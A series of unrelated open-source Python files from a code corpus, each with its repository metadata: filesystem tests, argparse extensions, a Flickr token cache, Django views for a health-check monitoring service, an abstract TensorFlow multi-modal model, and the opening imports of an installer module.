        self.assertEqual(read_binary_file(path, limit=-3), b"end")
    def test_read_binary_file_with_limit_bigger_than_file(self):
        """
        If the limit is bigger than the file L{read_binary_file} reads the
        entire file.
        """
        path = self.makeFile("foo bar from end")
        self.assertEqual(
            read_binary_file(path, limit=100), b"foo bar from end")
        self.assertEqual(
            read_binary_file(path, limit=-100), b"foo bar from end")
    def test_read_text_file(self):
        """
        With no options L{read_text_file} reads the whole file passed as
        argument as string decoded with utf-8.
        """
        utf8_content = codecs.encode(u"foo \N{SNOWMAN}", "utf-8")
        path = self.makeFile(utf8_content, mode="wb")
        self.assertEqual(read_text_file(path), u"foo ☃")
    def test_read_text_file_with_limit(self):
        """
        With a positive limit L{read_text_file} returns up to L{limit}
        characters from the start of the file.
        """
        utf8_content = codecs.encode(u"foo \N{SNOWMAN}", "utf-8")
        path = self.makeFile(utf8_content, mode="wb")
        self.assertEqual(read_text_file(path, limit=3), u"foo")
    def test_read_text_file_with_negative_limit(self):
        """
        With a negative limit L{read_text_file} reads only the tail characters
        of the string.
        """
        utf8_content = codecs.encode(u"foo \N{SNOWMAN} bar", "utf-8")
        path = self.makeFile(utf8_content, mode="wb")
        self.assertEqual(read_text_file(path, limit=-5), u"☃ bar")
    def test_read_text_file_with_limit_bigger_than_file(self):
        """
        If the limit is bigger than the file L{read_text_file} reads the entire
        file.
        """
        utf8_content = codecs.encode(u"foo \N{SNOWMAN} bar", "utf-8")
        path = self.makeFile(utf8_content, mode="wb")
        self.assertEqual(read_text_file(path, limit=100), u"foo ☃ bar")
        self.assertEqual(read_text_file(path, limit=-100), u"foo ☃ bar")
    def test_read_text_file_with_broken_utf8(self):
        """
        A text file containing broken UTF-8 shouldn't cause an error, just
        return some sensible replacement chars.
        """
        not_quite_utf8_content = b'foo \xca\xff bar'
        path = self.makeFile(not_quite_utf8_content, mode='wb')
        self.assertEqual(read_text_file(path), u'foo \ufffd\ufffd bar')
        self.assertEqual(read_text_file(path, limit=5), u'foo \ufffd')
        self.assertEqual(read_text_file(path, limit=-3), u'bar')
class TouchFileTest(BaseTestCase):
    """Tests for touch_file(), including the offset_seconds backdating."""
    @patch("os.utime")
    def test_touch_file(self, utime_mock):
        """
        The L{touch_file} function touches a file, setting its last
        modification time.
        """
        path = self.makeFile()
        touch_file(path)
        utime_mock.assert_called_once_with(path, None)
        self.assertFileContent(path, b"")
    def test_touch_file_multiple_times(self):
        """
        The L{touch_file} function can be called multiple times.
        """
        path = self.makeFile()
        touch_file(path)
        touch_file(path)
        self.assertFileContent(path, b"")
    def test_touch_file_with_offset_seconds(self):
        """
        The L{touch_file} function can be called with a offset in seconds that
        will be reflected in the access and modification times of the file.
        """
        path = self.makeFile()
        current_time = long(time.time())
        expected_time = current_time - 1
        # Freeze time.time() so the expected utime arguments are exact.
        with patch.object(
                time, "time", return_value=current_time) as time_mock:
            with patch.object(os, "utime") as utime_mock:
                touch_file(path, offset_seconds=-1)
                time_mock.assert_called_once_with()
        utime_mock.assert_called_once_with(
            path, (expected_time, expected_time))
        self.assertFileContent(path, b"")
class AppendFileTest(BaseTestCase):
    """Tests for append_text_file() and append_binary_file()."""
    def test_append_existing_text_file(self):
        """
        The L{append_text_file} function appends contents to an existing file.
        """
        existing_file = self.makeFile("foo bar")
        append_text_file(existing_file, u" baz ☃")
        self.assertFileContent(existing_file, b"foo bar baz \xe2\x98\x83")
    def test_append_text_no_file(self):
        """
        The L{append_text_file} function creates a new file if one doesn't
        exist already.
        """
        new_file = os.path.join(self.makeDir(), "new_file")
        append_text_file(new_file, u"contents ☃")
        self.assertFileContent(new_file, b"contents \xe2\x98\x83")
    def test_append_existing_binary_file(self):
        """
        The L{append_binary_file} function appends contents to an existing
        file.
        """
        existing_file = self.makeFile("foo bar")
        append_binary_file(existing_file, b" baz \xe2\x98\x83")
        self.assertFileContent(existing_file, b"foo bar baz \xe2\x98\x83")
    def test_append_binary_no_file(self):
        """
        The L{append_binary_file} function creates a new file if one doesn't
        exist already.
        """
        new_file = os.path.join(self.makeDir(), "new_file")
        append_binary_file(new_file, b"contents \xe2\x98\x83")
        self.assertFileContent(new_file, b"contents \xe2\x98\x83")
| CanonicalLtd/landscape-client | landscape/lib/tests/test_fs.py | Python | gpl-2.0 | 6,532 |
# -*- coding: utf-8 -*-
"""
Extensions to the argparse library for calmjs.
a.k.a. nyanpasu
"""
from __future__ import absolute_import
import argparse
import sys
import textwrap
from functools import partial
from os import linesep
from os.path import pathsep
from argparse import _
from argparse import Action
from argparse import HelpFormatter
from pkg_resources import working_set as default_working_set
from pkg_resources import Requirement
from calmjs.utils import requirement_comma_list
# Attribute names used to stash calmjs runtime metadata on parser instances;
# read back by the Version action below.
ATTR_INFO = '_calmjs_runtime_info'
ATTR_ROOT_PKG = '_calmjs_root_pkg_name'
def metavar(name):
    """Return *name* lower-cased and wrapped in angle brackets."""
    return '<%s>' % name.lower()
class Namespace(argparse.Namespace):
    """
    Namespace that merges, rather than replaces, parsed values of
    matching container types; useful in the context of sub-parsers
    where the same destination may be assigned more than once.
    """

    def __setattr__(self, name, value):
        _unset = object()
        current = getattr(self, name, _unset)
        if current is not _unset:
            # Merge dict-into-dict and list-into-list in place; any
            # other combination simply replaces the old value.
            if isinstance(current, dict) and isinstance(value, dict):
                current.update(value)
                value = current
            elif isinstance(current, list) and isinstance(value, list):
                current.extend(value)
                value = current
        super(Namespace, self).__setattr__(name, value)
class HyphenNoBreakHelpFormatter(HelpFormatter):
    """Help formatter that never wraps lines at hyphens, keeping option
    names such as '--long-option' intact in help text."""

    def _split_lines(self, text, width):
        # Collapse whitespace the same way the base class does, then wrap
        # with textwrap's hyphen breaking disabled.
        text = self._whitespace_matcher.sub(' ', text).strip()
        return textwrap.wrap(text, width, break_on_hyphens=False)
class SortedHelpFormatter(HelpFormatter):
    """Help formatter that lists options alphabetically, with short
    options ('-x') grouped before long ones ('--xyz')."""

    def add_arguments(self, actions):
        def key_func(action):
            option_strings = getattr(action, 'option_strings', None)
            if not option_strings:
                # NOTE(review): positional actions fall through here and
                # return an empty list, which is not orderable against the
                # (bool, str) tuples below on Python 3 — appears to rely on
                # argparse passing only one kind per group; confirm.
                return option_strings
            # normalize it to lower case.
            arg = option_strings[0]
            # False (short option) sorts before True (long option).
            return arg.startswith('--'), arg.lower()

        actions = sorted(actions, key=key_func)
        super(SortedHelpFormatter, self).add_arguments(actions)
class CalmJSHelpFormatter(SortedHelpFormatter, HyphenNoBreakHelpFormatter):
    """
    The official formatter for this project
    """
    # Combines alphabetical option sorting with hyphen-preserving line
    # wrapping through cooperative multiple inheritance; adds no behavior
    # of its own.
class Version(Action):
    """
    Version reporting for a console_scripts entry_point
    """

    def __init__(self, *a, **kw):
        # Consumes no command-line values; the flag itself triggers the
        # report.
        kw['nargs'] = 0
        super(Version, self).__init__(*a, **kw)

    def get_dist_info(self, dist, default_name='?'):
        """Return (name, version, location) for a distribution, using '?'
        placeholders for any metadata that is unavailable."""
        name = getattr(dist, 'project_name', default_name)
        version = getattr(dist, 'version', '?')
        location = getattr(dist, 'location', '?')
        return name, version, location

    def __call__(self, parser, namespace, values, option_string=None):
        """
        Invoke to get version.

        Prints version lines for the root package (ATTR_ROOT_PKG) and any
        runtime distributions recorded on the parser (ATTR_INFO), then
        exits the process.
        """
        # I really do not like this implementation, but under Python 2.7
        # argparser is broken with subcommands and it quits with too few
        # arguments too soon.

        # Related issues:
        # http://bugs.python.org/issue9253#msg186387
        # http://bugs.python.org/issue10424
        rt_pkg_name = getattr(parser, ATTR_ROOT_PKG, None)
        results = []
        if rt_pkg_name:
            # We can use this directly as nothing else should be cached
            # where this is typically invoked.

            # if the argparser is dumber (which makes it smarter) and
            # doesn't have code that randomly call exit on its own with
            # other _default_ Actions it provides, a flag could just
            # simply be marked and/or returned to inform the caller
            # (i.e. the run time) to handle that.
            dist = default_working_set.find(Requirement.parse(rt_pkg_name))
            results.append('%s %s from %s' % self.get_dist_info(dist))
            results.append(linesep)
        infos = getattr(parser, ATTR_INFO, [])
        for info in infos:
            prog, rt_dist = info
            results.append(
                prog + ': %s %s from %s' % self.get_dist_info(rt_dist))
            results.append(linesep)
        if not results:
            results = ['no package information available.']
        # I'd rather return the results than just exiting outright, but
        # remember the bugs that will make an error happen otherwise...
        # quit early so they don't bug.
        for i in results:
            sys.stdout.write(i)
        sys.exit(0)
class MultiChoice(object):
    """Choices container that accepts separator-delimited combinations.

    Membership succeeds when every token of the candidate string (after
    splitting on the separator) is one of the declared choices; iteration
    yields the declared choices in their original order.
    """

    def __init__(self, choices=(), sep=','):
        self._ordered = choices
        self._allowed = set(choices)
        self._sep = sep

    def __contains__(self, other):
        tokens = set(other.split(self._sep))
        return tokens.issubset(self._allowed)

    def __iter__(self):
        return iter(self._ordered)
class StoreDelimitedListBase(Action):
    """Action that splits its single argument on a separator and
    accumulates the resulting items into a list across repeated uses."""

    def __init__(self, option_strings, dest, sep=',', maxlen=None, **kw):
        self.sep = sep
        self.maxlen = maxlen
        # Exactly one raw argument is consumed per occurrence.
        kw['nargs'] = 1
        kw['const'] = None
        default = kw.get('default')
        if 'choices' in kw:
            # Wrap so delimited combinations validate against the choices.
            kw['choices'] = MultiChoice(choices=kw['choices'], sep=sep)
        if default is not None and not isinstance(default, (tuple, list)):
            raise ValueError(
                'provided default for store delimited list must be a list or '
                'tuple.'
            )
        super(StoreDelimitedListBase, self).__init__(
            option_strings=option_strings, dest=dest, **kw)

    def _convert(self, values):
        # Split the raw argument; drop a single trailing empty token so
        # that e.g. 'a,b,' yields ['a', 'b'].
        result = values[0].split(self.sep)
        if result[-1] == '':
            result.pop(-1)
        return result

    def __call__(self, parser, namespace, values, option_string=None):
        # Start from an empty list when unset or still pointing at the
        # shared default, so the default object is never mutated.
        if not hasattr(namespace, self.dest) or getattr(
                namespace, self.dest) is self.default:
            value = []
        else:
            value = getattr(namespace, self.dest)
        result = value + self._convert(values)
        if self.maxlen:
            result = result[:self.maxlen]
        # use the root object's version to be sure that is reset.
        # (bypasses the merging Namespace.__setattr__ defined above)
        object.__setattr__(namespace, self.dest, result)
class StoreCommaDelimitedList(StoreDelimitedListBase):
    """Delimited-list action with ',' as the separator."""

    def __init__(self, option_strings, dest, **kw):
        super(StoreCommaDelimitedList, self).__init__(
            option_strings=option_strings, dest=dest, sep=',', **kw)


# Backwards-compatible alias for the comma-delimited variant.
StoreDelimitedList = StoreCommaDelimitedList
class StorePathSepDelimitedList(StoreDelimitedListBase):
    """Delimited-list action using os.pathsep as the separator
    (':' on POSIX, ';' on Windows)."""

    def __init__(self, option_strings, dest, **kw):
        super(StorePathSepDelimitedList, self).__init__(
            option_strings=option_strings, dest=dest, sep=pathsep, **kw)
class StoreRequirementList(StoreDelimitedListBase):
    """Delimited-list action for package requirement strings."""

    def _convert(self, values):
        # requirement_comma_list comes from calmjs.utils — presumably a
        # splitter aware of commas inside version specifiers; confirm
        # against calmjs.utils.
        return requirement_comma_list.split(values[0])
class DeprecatedAction(Action):
    """Action wrapper that emits a DeprecationWarning and then delegates
    to the wrapped action instance."""

    def __init__(self, original_action_cls, deprecation, *a, **kw):
        self.original_action = original_action_cls(*a, **kw)
        # copy the kwargs from within to ensure API compatibility and
        # expectations
        kw.update(self.original_action._get_kwargs())
        # only set message if it's a string.
        self.deprecation = '' if deprecation is True else deprecation
        # Hide deprecated options from --help output.
        kw['help'] = argparse.SUPPRESS
        super(DeprecatedAction, self).__init__(*a, **kw)

    def __call__(self, parser, namespace, values, option_string=None):
        import warnings
        msg = "option '%s' is deprecated" % option_string
        if self.deprecation:
            msg = msg + ': ' + self.deprecation
        warnings.warn(msg, DeprecationWarning)
        # Delegate the actual argument handling to the wrapped action.
        return self.original_action(
            parser, namespace, values, option_string=option_string)
class ArgumentParser(argparse.ArgumentParser):
    """ArgumentParser preconfigured with the calmjs help formatter and
    merging Namespace, with support for a `deprecation` keyword on
    add_argument and non-fatal error reporting helpers."""

    def __init__(self, formatter_class=CalmJSHelpFormatter, **kw):
        super(ArgumentParser, self).__init__(
            formatter_class=formatter_class, **kw)

    # In Python 3, this particular error message was removed, so we will
    # do this for Python 2 in this blunt manner.
    def error(self, message):
        if message != _('too few arguments'):
            super(ArgumentParser, self).error(message)

    def parse_known_args(self, args=None, namespace=None):
        # Default to the merging Namespace defined in this module so that
        # sub-parser results accumulate instead of overwriting.
        if namespace is None:
            namespace = Namespace()
        return super(ArgumentParser, self).parse_known_args(args, namespace)

    def _pop_action_class(self, kwargs, default=None):
        # Intercept the calmjs-specific 'deprecation' keyword before the
        # base class sees (and rejects) it.
        deprecation = kwargs.pop('deprecation', None)
        action = super(ArgumentParser, self)._pop_action_class(kwargs, default)
        if deprecation:
            # as the deprecation class acts as a wrapper
            action = partial(
                DeprecatedAction,
                original_action_cls=action,
                deprecation=deprecation,
            )
        return action

    def soft_error(self, message):
        """
        Same as error, without the dying in a fire part.
        """
        self.print_usage(sys.stderr)
        args = {'prog': self.prog, 'message': message}
        self._print_message(
            _('%(prog)s: error: %(message)s\n') % args, sys.stderr)

    def unrecognized_arguments_error(self, args):
        """Report unrecognized arguments without exiting."""
        self.soft_error(_('unrecognized arguments: %s') % ' '.join(args))
| calmjs/calmjs | src/calmjs/argparse.py | Python | gpl-2.0 | 9,195 |
'''Persistent token cache management for the Flickr API'''
import os.path
import logging
logging.basicConfig()
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
__all__ = ('TokenCache', 'SimpleTokenCache')
class SimpleTokenCache(object):
    '''In-memory token cache.'''

    def __init__(self):
        # Start out empty; forget() establishes the "no token" state.
        self.forget()

    def forget(self):
        '''Removes the cached token'''
        self.token = None
class TokenCache(object):
    '''On-disk persistent token cache for a single application.

    The application is identified by the API key used. Per
    application multiple users are supported, with a single
    token per user.

    Tokens are stored under ``~/.flickr/<api_key>/``.
    '''

    def __init__(self, api_key, username=None):
        '''Creates a new token cache instance'''

        self.api_key = api_key
        self.username = username
        # In-memory cache of tokens, keyed by username (None for the
        # default, username-less token).
        self.memory = {}

    def __get_cached_token_path(self):
        """Return the directory holding the app data."""
        return os.path.expanduser(os.path.join("~", ".flickr", self.api_key))

    def __get_cached_token_filename(self):
        """Return the full pathname of the cached token file."""
        if self.username:
            filename = 'auth-%s.token' % self.username
        else:
            filename = 'auth.token'
        return os.path.join(self.__get_cached_token_path(), filename)

    def __get_cached_token(self):
        """Read and return a cached token, or None if not found.

        The token is read from the cached token file.
        """

        # Serve from the in-memory cache when possible.
        # NOTE(review): tokens read from disk are deliberately NOT stored
        # back into self.memory here, so each miss re-reads the file —
        # confirm whether memoizing the read is intended.
        if self.username in self.memory:
            return self.memory[self.username]

        try:
            # open() instead of the Python-2-only file() builtin; the
            # context manager guarantees the handle is closed even on
            # a read error.
            with open(self.__get_cached_token_filename(), "r") as f:
                return f.read().strip()
        except IOError:
            # No cached token (or unreadable file) — report "not found".
            return None

    def __set_cached_token(self, token):
        """Cache a token for later use."""

        # Remember for later use
        self.memory[self.username] = token

        path = self.__get_cached_token_path()
        if not os.path.exists(path):
            os.makedirs(path)

        # Write with a trailing newline, matching the previous
        # ``print >>f, token`` behavior.
        with open(self.__get_cached_token_filename(), "w") as f:
            f.write('%s\n' % token)

    def forget(self):
        '''Removes the cached token'''

        if self.username in self.memory:
            del self.memory[self.username]
        filename = self.__get_cached_token_filename()
        if os.path.exists(filename):
            os.unlink(filename)

    # Property giving read/write/delete access to the cached token.
    token = property(__get_cached_token, __set_cached_token, forget,
                     "The cached token")
| jwheare/digest | lib/flickrapi/tokencache.py | Python | bsd-3-clause | 2,638 |
from collections import Counter
from datetime import timedelta as td
from itertools import tee
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.db.models import Count
from django.http import HttpResponseBadRequest, HttpResponseForbidden
from django.shortcuts import get_object_or_404, redirect, render
from django.utils import timezone
from django.utils.crypto import get_random_string
from django.utils.six.moves.urllib.parse import urlencode
from hc.api.decorators import uuid_or_400
from hc.api.models import DEFAULT_GRACE, DEFAULT_TIMEOUT, Channel, Check, Ping
from hc.front.forms import AddChannelForm, AddWebhookForm, NameTagsForm, TimeoutForm
# from itertools recipes:
def pairwise(iterable):
    """Yield consecutive overlapping pairs: s -> (s0, s1), (s1, s2), ..."""
    left, right = tee(iterable)
    # Advance the second iterator by one; harmless on empty input.
    next(right, None)
    return zip(left, right)
@login_required
def my_checks(request):
    """Render the checks dashboard with per-tag status summaries."""
    q = Check.objects.filter(user=request.team.user).order_by("created")
    checks = list(q)

    counter = Counter()
    down_tags, grace_tags = set(), set()
    for check in checks:
        status = check.get_status()
        for tag in check.tags_list():
            if tag == "":
                continue

            counter[tag] += 1

            # A tag is "down" if any of its checks is down, otherwise
            # "grace" if any of its checks is in the grace period.
            if status == "down":
                down_tags.add(tag)
            elif check.in_grace_period():
                grace_tags.add(tag)

    ctx = {
        "page": "checks",
        "checks": checks,
        "now": timezone.now(),
        "tags": counter.most_common(),
        "down_tags": down_tags,
        "grace_tags": grace_tags,
        "ping_endpoint": settings.PING_ENDPOINT
    }

    return render(request, "front/my_checks.html", ctx)
def _welcome_check(request):
    """Return the demo check tied to this session, creating it on demand.

    The check's code is remembered in the session so the same anonymous
    visitor keeps seeing the same check on the welcome/docs pages.
    """
    check = None
    if "welcome_code" in request.session:
        code = request.session["welcome_code"]
        check = Check.objects.filter(code=code).first()

    if check is None:
        check = Check()
        check.save()
        request.session["welcome_code"] = str(check.code)

    return check
def index(request):
    """Landing page: checks dashboard when signed in, welcome otherwise."""
    if request.user.is_authenticated():
        return redirect("hc-checks")

    check = _welcome_check(request)

    ctx = {
        "page": "welcome",
        "check": check,
        "ping_url": check.url(),
        "enable_pushover": settings.PUSHOVER_API_TOKEN is not None
    }

    return render(request, "front/welcome.html", ctx)
def docs(request):
    """Render the main documentation page using the session's demo check."""
    check = _welcome_check(request)

    ctx = {
        "page": "docs",
        "section": "home",
        "ping_endpoint": settings.PING_ENDPOINT,
        "check": check,
        "ping_url": check.url()
    }

    return render(request, "front/docs.html", ctx)
def docs_api(request):
    """Render the API documentation page."""
    ctx = {
        "page": "docs",
        "section": "api",
        "SITE_ROOT": settings.SITE_ROOT,
        "PING_ENDPOINT": settings.PING_ENDPOINT,
        # Defaults shown in the docs, expressed in whole seconds.
        "default_timeout": int(DEFAULT_TIMEOUT.total_seconds()),
        "default_grace": int(DEFAULT_GRACE.total_seconds())
    }

    return render(request, "front/docs_api.html", ctx)
def about(request):
    """Render the static "About" page."""
    return render(request, "front/about.html", {"page": "about"})
@login_required
def add_check(request):
    """POST handler: create a new check and attach all existing channels."""
    assert request.method == "POST"

    check = Check(user=request.team.user)
    check.save()

    check.assign_all_channels()
    return redirect("hc-checks")
@login_required
@uuid_or_400
def update_name(request, code):
    """POST handler: update a check's name and tags."""
    assert request.method == "POST"

    check = get_object_or_404(Check, code=code)
    # Ownership check: only the owning team's checks may be edited.
    if check.user_id != request.team.user.id:
        return HttpResponseForbidden()

    form = NameTagsForm(request.POST)
    if form.is_valid():
        check.name = form.cleaned_data["name"]
        check.tags = form.cleaned_data["tags"]
        check.save()

    return redirect("hc-checks")
@login_required
@uuid_or_400
def update_timeout(request, code):
    """POST handler: update a check's timeout and grace periods."""
    assert request.method == "POST"

    check = get_object_or_404(Check, code=code)
    if check.user != request.team.user:
        return HttpResponseForbidden()

    form = TimeoutForm(request.POST)
    if form.is_valid():
        # Form fields are plain seconds; stored as timedeltas.
        check.timeout = td(seconds=form.cleaned_data["timeout"])
        check.grace = td(seconds=form.cleaned_data["grace"])
        check.save()

    return redirect("hc-checks")
@login_required
@uuid_or_400
def remove_check(request, code):
    """POST handler: delete a check owned by the current team."""
    assert request.method == "POST"

    check = get_object_or_404(Check, code=code)
    if check.user != request.team.user:
        return HttpResponseForbidden()

    check.delete()
    return redirect("hc-checks")
@login_required
@uuid_or_400
def log(request, code):
    """Render a check's ping log, inserting "missed ping" placeholders."""
    check = get_object_or_404(Check, code=code)
    if check.user != request.team.user:
        return HttpResponseForbidden()

    limit = request.team.ping_log_limit
    pings = Ping.objects.filter(owner=check).order_by("-id")[:limit]

    pings = list(pings.iterator())
    # oldest-to-newest order will be more convenient for adding
    # "not received" placeholders:
    pings.reverse()

    # Add a dummy ping object at the end. We iterate over *pairs* of pings
    # and don't want to handle a special case of a check with a single ping.
    pings.append(Ping(created=timezone.now()))

    # Now go through pings, calculate time gaps, and decorate
    # the pings list for convenient use in template
    wrapped = []

    early = False
    for older, newer in pairwise(pings):
        wrapped.append({"ping": older, "early": early})

        # Fill in "missed ping" placeholders (capped at 10 per gap):
        expected_date = older.created + check.timeout
        n_blanks = 0
        while expected_date + check.grace < newer.created and n_blanks < 10:
            wrapped.append({"placeholder_date": expected_date})
            expected_date = expected_date + check.timeout
            n_blanks += 1

        # Prepare early flag for next ping to come
        early = older.created + check.timeout > newer.created + check.grace

    # NOTE(review): `pings` now includes the dummy entry, so num_pings is
    # the real count plus one and reached_limit fires once exactly `limit`
    # pings exist — confirm this is the intended display behavior.
    reached_limit = len(pings) > limit

    wrapped.reverse()
    ctx = {
        "check": check,
        "pings": wrapped,
        "num_pings": len(pings),
        "limit": limit,
        "show_limit_notice": reached_limit and settings.USE_PAYMENTS
    }

    return render(request, "front/log.html", ctx)
@login_required
def channels(request):
    """List notification channels; POST reassigns a channel's checks."""
    if request.method == "POST":
        code = request.POST["channel"]
        try:
            channel = Channel.objects.get(code=code)
        except Channel.DoesNotExist:
            return HttpResponseBadRequest()
        if channel.user_id != request.team.user.id:
            return HttpResponseForbidden()

        # Checkbox fields are named "check-<uuid>"; collect the selected
        # checks, verifying ownership of each.
        new_checks = []
        for key in request.POST:
            if key.startswith("check-"):
                code = key[6:]
                try:
                    check = Check.objects.get(code=code)
                except Check.DoesNotExist:
                    return HttpResponseBadRequest()
                if check.user_id != request.team.user.id:
                    return HttpResponseForbidden()
                new_checks.append(check)

        channel.checks = new_checks
        return redirect("hc-channels")

    channels = Channel.objects.filter(user=request.team.user).order_by("created")
    channels = channels.annotate(n_checks=Count("checks"))

    num_checks = Check.objects.filter(user=request.team.user).count()

    ctx = {
        "page": "channels",
        "channels": channels,
        "num_checks": num_checks,
        "enable_pushover": settings.PUSHOVER_API_TOKEN is not None,
    }
    return render(request, "front/channels.html", ctx)
def do_add_channel(request, data):
    """Validate channel form data, save it, and attach it to all checks."""
    form = AddChannelForm(data)
    if form.is_valid():
        channel = form.save(commit=False)
        channel.user = request.team.user
        channel.save()

        channel.assign_all_checks()

        # Email channels must be verified by the recipient before use.
        if channel.kind == "email":
            channel.send_verify_link()

        return redirect("hc-channels")
    else:
        return HttpResponseBadRequest()
@login_required
def add_channel(request):
    """POST handler: create a channel from the submitted form data."""
    assert request.method == "POST"
    return do_add_channel(request, request.POST)
@login_required
@uuid_or_400
def channel_checks(request, code):
    """Render the check-assignment dialog for a channel."""
    channel = get_object_or_404(Channel, code=code)
    if channel.user_id != request.team.user.id:
        return HttpResponseForbidden()

    # Codes of checks already attached to this channel, for pre-checking
    # the corresponding checkboxes.
    assigned = set(channel.checks.values_list('code', flat=True).distinct())
    checks = Check.objects.filter(user=request.team.user).order_by("created")

    ctx = {
        "checks": checks,
        "assigned": assigned,
        "channel": channel
    }

    return render(request, "front/channel_checks.html", ctx)
@uuid_or_400
def verify_email(request, code, token):
    """Confirm an email channel via the token from the verification link."""
    channel = get_object_or_404(Channel, code=code)
    # The token is derived from the channel itself; a match proves the
    # recipient followed the emailed verification link.
    if channel.make_token() == token:
        channel.email_verified = True
        channel.save()
        return render(request, "front/verify_email_success.html")

    return render(request, "bad_link.html")
@login_required
@uuid_or_400
def remove_channel(request, code):
    """POST handler: delete a channel (tolerant of double-submits)."""
    assert request.method == "POST"

    # user may refresh the page during POST and cause two deletion attempts
    channel = Channel.objects.filter(code=code).first()
    if channel:
        if channel.user != request.team.user:
            return HttpResponseForbidden()
        channel.delete()

    return redirect("hc-channels")
@login_required
def add_email(request):
    """Render the email integration instructions page."""
    ctx = {"page": "channels"}
    return render(request, "integrations/add_email.html", ctx)
@login_required
def add_webhook(request):
    """Create a webhook integration from the form, or render the form."""
    if request.method == "POST":
        form = AddWebhookForm(request.POST)
        if form.is_valid():
            channel = Channel(user=request.team.user, kind="webhook")
            channel.value = form.get_value()
            channel.save()

            channel.assign_all_checks()
            return redirect("hc-channels")
    else:
        form = AddWebhookForm()

    # Invalid POSTs fall through and re-render the bound form with errors.
    ctx = {"page": "channels", "form": form}
    return render(request, "integrations/add_webhook.html", ctx)
@login_required
def add_pd(request):
    """Render the PagerDuty integration instructions page."""
    ctx = {"page": "channels"}
    return render(request, "integrations/add_pd.html", ctx)


@login_required
def add_slack(request):
    """Render the Slack integration instructions page."""
    ctx = {"page": "channels"}
    return render(request, "integrations/add_slack.html", ctx)


@login_required
def add_hipchat(request):
    """Render the HipChat integration instructions page."""
    ctx = {"page": "channels"}
    return render(request, "integrations/add_hipchat.html", ctx)
@login_required
def add_pushover(request):
    """Set up or tear down a Pushover integration.

    POST initiates the Pushover subscription flow and redirects to the
    Pushover site; Pushover then redirects back here with
    ``pushover_user_key`` plus the nonce/priority parameters embedded in
    the success URL.  A plain GET renders the settings form.
    """
    if settings.PUSHOVER_API_TOKEN is None or \
            settings.PUSHOVER_SUBSCRIPTION_URL is None:
        return HttpResponseForbidden()

    if request.method == "POST":
        # Initiate the subscription; the nonce ties the eventual callback
        # back to this session.
        nonce = get_random_string()
        request.session["po_nonce"] = nonce

        failure_url = settings.SITE_ROOT + reverse("hc-channels")
        success_url = settings.SITE_ROOT + reverse("hc-add-pushover") + "?" + \
            urlencode({
                "nonce": nonce,
                "prio": request.POST.get("po_priority", "0"),
            })
        subscription_url = settings.PUSHOVER_SUBSCRIPTION_URL + "?" + \
            urlencode({
                "success": success_url,
                "failure": failure_url,
            })

        return redirect(subscription_url)

    # Handle successful subscriptions
    if "pushover_user_key" in request.GET:
        if "nonce" not in request.GET or "prio" not in request.GET:
            return HttpResponseBadRequest()

        # Validate nonce
        if request.GET["nonce"] != request.session.get("po_nonce"):
            return HttpResponseForbidden()

        # Validate priority
        if request.GET["prio"] not in ("-2", "-1", "0", "1", "2"):
            return HttpResponseBadRequest()

        # All looks well--
        del request.session["po_nonce"]

        if request.GET.get("pushover_unsubscribed") == "1":
            # Unsubscription: delete all Pushover channels for this account.
            # Fix: filter on request.team.user (the account that owns the
            # channels, as used everywhere else in this module), not
            # request.user, which can differ when operating on a team.
            Channel.objects.filter(user=request.team.user, kind="po").delete()
            return redirect("hc-channels")
        else:
            # Subscription
            user_key = request.GET["pushover_user_key"]
            priority = int(request.GET["prio"])

            # Channel value encodes both the user key and the priority.
            return do_add_channel(request, {
                "kind": "po",
                "value": "%s|%d" % (user_key, priority),
            })

    # Show Integration Settings form
    ctx = {
        "page": "channels",
        "po_retry_delay": td(seconds=settings.PUSHOVER_EMERGENCY_RETRY_DELAY),
        "po_expiration": td(seconds=settings.PUSHOVER_EMERGENCY_EXPIRATION),
    }
    return render(request, "integrations/add_pushover.html", ctx)
@login_required
def add_victorops(request):
    """Render the VictorOps integration instructions page."""
    ctx = {"page": "channels"}
    return render(request, "integrations/add_victorops.html", ctx)
def privacy(request):
    """Render the static privacy policy page."""
    return render(request, "front/privacy.html", {})


def terms(request):
    """Render the static terms of service page."""
    return render(request, "front/terms.html", {})
| BetterWorks/healthchecks | hc/front/views.py | Python | bsd-3-clause | 12,979 |
# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Abstract multi-modal model."""
import abc
import tensorflow as tf
class MultiModalModel(tf.keras.Model):
  """Abstract base class for multi-modal video understanding.

  Subclasses register one sub-model per input modality in the registries
  created below and must implement the abstract hooks: forward pass,
  checkpoint restore, loss, prediction and metric computation.
  """

  def __init__(self, is_training):
    """Constructor."""
    super(MultiModalModel, self).__init__()
    self.is_training = is_training
    # Per-modality registries, each keyed by feature/modality name:
    # output head, sub-model, hyper-parameters and input preprocessor.
    for registry_name in ('feature_to_output', 'feature_to_model',
                          'feature_to_params', 'feature_to_preprocessor'):
      setattr(self, registry_name, {})

  @abc.abstractmethod
  def call(self, inputs):
    """Execute the model with inputs."""
    raise NotImplementedError

  @abc.abstractmethod
  def restore_from_objects(self, checkpoint_type):
    """Restore model from trackable objects."""
    raise NotImplementedError

  @abc.abstractmethod
  def loss(self, features, pred_dict, target_dict):
    """Compute losses."""
    raise NotImplementedError

  @abc.abstractmethod
  def predict(self, features, dataset_config):
    """Produce predictions given the features."""
    raise NotImplementedError

  @abc.abstractmethod
  def get_metrics(self, eval_config):
    """Get model specific metrics given the eval_config."""
    raise NotImplementedError

  @abc.abstractmethod
  def compute_metrics(self, eval_dict, eval_metrics, **kwargs):
    """Compute metrics."""
    raise NotImplementedError

  def visualization(self, eval_config, eval_dataset_config, **kwargs):
    """Model specific visualization; no-op by default."""
    pass
| google-research/mint | mint/core/multi_modal_model.py | Python | apache-2.0 | 2,064 |
#
# instdata.py - central store for all configuration data needed to install
#
# Erik Troan <ewt@redhat.com>
#
# Copyright 2001-2007 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import os
import string
import language
import network
import firewall
import security
import timezone
import desktop
import fsset
import bootloader
import partitions
